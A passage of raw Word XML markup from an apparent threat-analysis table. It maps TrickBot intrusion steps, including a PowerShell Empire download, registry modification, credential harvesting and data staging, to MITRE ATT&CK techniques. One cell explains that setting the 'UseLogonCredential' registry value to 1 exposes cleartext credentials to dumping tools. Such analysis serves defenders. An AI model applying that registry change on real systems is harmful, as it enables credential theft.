          <w:p w14:paraId="5769BAB2" w14:textId="7139BD85" w:rsidR="008D17AE" w:rsidRPr="004A553D" w:rsidRDefault="00D4300F" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E2C2BEA" w14:textId="77777777" w:rsidR="008D17AE" w:rsidRPr="004A553D" w:rsidRDefault="008D17AE" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F9D5D0A" w14:textId="77777777" w:rsidR="008D17AE" w:rsidRPr="004A553D" w:rsidRDefault="008D17AE" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="630728D7" w14:textId="77777777" w:rsidR="008D17AE" w:rsidRPr="004A553D" w:rsidRDefault="008D17AE" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24B6A2A3" w14:textId="65B22193" w:rsidR="008D17AE" w:rsidRPr="004A553D" w:rsidRDefault="008D17AE" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>[2] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D17AE" w:rsidRPr="00D3685E" w14:paraId="37A49415" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06511134" w14:textId="5A011BEF" w:rsidR="008D17AE" w:rsidRPr="00D3685E" w:rsidRDefault="008D17AE" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0056392C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F0DA4D8" w14:textId="77777777" w:rsidR="008D17AE" w:rsidRPr="00D3685E" w:rsidRDefault="008D17AE" w:rsidP="00EC7F41">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964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7979F212" w14:textId="77777777" w:rsidR="008D17AE" w:rsidRPr="00D3685E" w:rsidRDefault="008D17AE" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56488344" w14:textId="65A737EC" w:rsidR="008D17AE" w:rsidRPr="00D3685E" w:rsidRDefault="005816E9" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00D4300F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36E0A2BE" w14:textId="77777777" w:rsidR="008D17AE" w:rsidRPr="00D3685E" w:rsidRDefault="008D17AE" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62D02119" w14:textId="77777777" w:rsidR="008D17AE" w:rsidRPr="00D3685E" w:rsidRDefault="008D17AE" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6592A042" w14:textId="77777777" w:rsidR="008D17AE" w:rsidRPr="00D3685E" w:rsidRDefault="008D17AE" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE/IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="451AFE8F" w14:textId="1B4D8600" w:rsidR="008D17AE" w:rsidRPr="00D3685E" w:rsidRDefault="008D17AE" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>[2] See above (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Powershell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Empire download)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF39C0" w:rsidRPr="005B41A3" w14:paraId="5CC742DF" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="210D245A" w14:textId="582D65CA" w:rsidR="00DF39C0" w:rsidRDefault="00DF39C0" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0056392C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10386571" w14:textId="3D9A934C" w:rsidR="00DF39C0" w:rsidRPr="005B41A3" w:rsidRDefault="00EC5098" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E98643C" w14:textId="437D5D50" w:rsidR="00DF39C0" w:rsidRPr="005B41A3" w:rsidRDefault="00EC5098" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1112 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Modify Registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="174A36E1" w14:textId="19D0EA93" w:rsidR="00DF39C0" w:rsidRPr="005B41A3" w:rsidRDefault="00DF39C0" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00D4300F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15280A7E" w14:textId="77777777" w:rsidR="00DF39C0" w:rsidRPr="005B41A3" w:rsidRDefault="00DF39C0" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C273274" w14:textId="21A4938D" w:rsidR="00DF39C0" w:rsidRPr="005B41A3" w:rsidRDefault="00DF39C0" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46C76C33" w14:textId="640B1100" w:rsidR="00DF39C0" w:rsidRPr="005B41A3" w:rsidRDefault="00DF39C0" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
            <w:r w:rsidR="00EC5098">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B8EB51E" w14:textId="47BFBC38" w:rsidR="00DF39C0" w:rsidRPr="005B41A3" w:rsidRDefault="00DF39C0" w:rsidP="000C5B1A">
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF39C0">
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF39C0">
              <w:t>TrickBot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF39C0">
              <w:t xml:space="preserve"> module used for credential harvesting is pwgrab64. As with all modules launched by the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF39C0">
              <w:t>TrickBot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF39C0">
              <w:t xml:space="preserve"> core, pwgrab64 is installed into a subfolder, usually named either “modules” or “data,” and modified the following registry value:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C5B1A" w:rsidRPr="005B41A3" w14:paraId="57DC42D0" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B98CC3E" w14:textId="79BFF5B0" w:rsidR="000C5B1A" w:rsidRPr="005B41A3" w:rsidRDefault="009A600A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0056392C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE03E31" w14:textId="34AB829E" w:rsidR="000C5B1A" w:rsidRPr="005B41A3" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0006 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18BEA536" w14:textId="48C5B066" w:rsidR="000C5B1A" w:rsidRPr="005B41A3" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1555.004 Credentials from Password Stores: Windows Credential Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64D4C010" w14:textId="07FC927F" w:rsidR="000C5B1A" w:rsidRPr="005B41A3" w:rsidRDefault="004F2A64" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00D4300F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C6C2E11" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="005B41A3" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E20830B" w14:textId="021DDF3D" w:rsidR="000C5B1A" w:rsidRPr="005B41A3" w:rsidRDefault="004F2A64" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50D90F89" w14:textId="0B8013E6" w:rsidR="000C5B1A" w:rsidRPr="005B41A3" w:rsidRDefault="0045093A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-CAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3235DFED" w14:textId="3DA25C68" w:rsidR="000C5B1A" w:rsidRPr="005B41A3" w:rsidRDefault="00045760" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="000C5B1A" w:rsidRPr="005B41A3">
              <w:t>Setting the “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000C5B1A" w:rsidRPr="005B41A3">
              <w:t>UseLogonCredential</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000C5B1A" w:rsidRPr="005B41A3">
              <w:t>” value to “1” configures the Windows operating system to store credentials as cleartext in memory, where they can then be retrieved via the use of credential dumping tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00045760" w:rsidRPr="005B41A3" w14:paraId="647B2709" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72613351" w14:textId="69A04630" w:rsidR="00045760" w:rsidRPr="005B41A3" w:rsidRDefault="00045760" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0056392C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15FA9042" w14:textId="0F36495E" w:rsidR="00045760" w:rsidRPr="005B41A3" w:rsidRDefault="00045760" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045760">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00045760">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00045760">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="487CE1C2" w14:textId="3435D0B1" w:rsidR="00045760" w:rsidRPr="005B41A3" w:rsidRDefault="00045760" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1074 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Data Staged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79EDA8A3" w14:textId="36EDEB88" w:rsidR="00045760" w:rsidRPr="005B41A3" w:rsidRDefault="00045760" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00D4300F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D6B7B43" w14:textId="77777777" w:rsidR="00045760" w:rsidRPr="005B41A3" w:rsidRDefault="00045760" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F649189" w14:textId="364CB556" w:rsidR="00045760" w:rsidRPr="005B41A3" w:rsidRDefault="00045760" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="202FE03B" w14:textId="4E3A8C8F" w:rsidR="00045760" w:rsidRPr="005B41A3" w:rsidRDefault="00045760" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE/AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67B9F865" w14:textId="272296E6" w:rsidR="00045760" w:rsidRPr="005B41A3" w:rsidRDefault="00045760" w:rsidP="000C5B1A">
            <w:r>
              <w:t>[2] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001207D8" w:rsidRPr="005B41A3" w14:paraId="61CD8800" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B25445F" w14:textId="69F62E66" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0056392C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FBCF103" w14:textId="706A2400" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001207D8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001207D8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
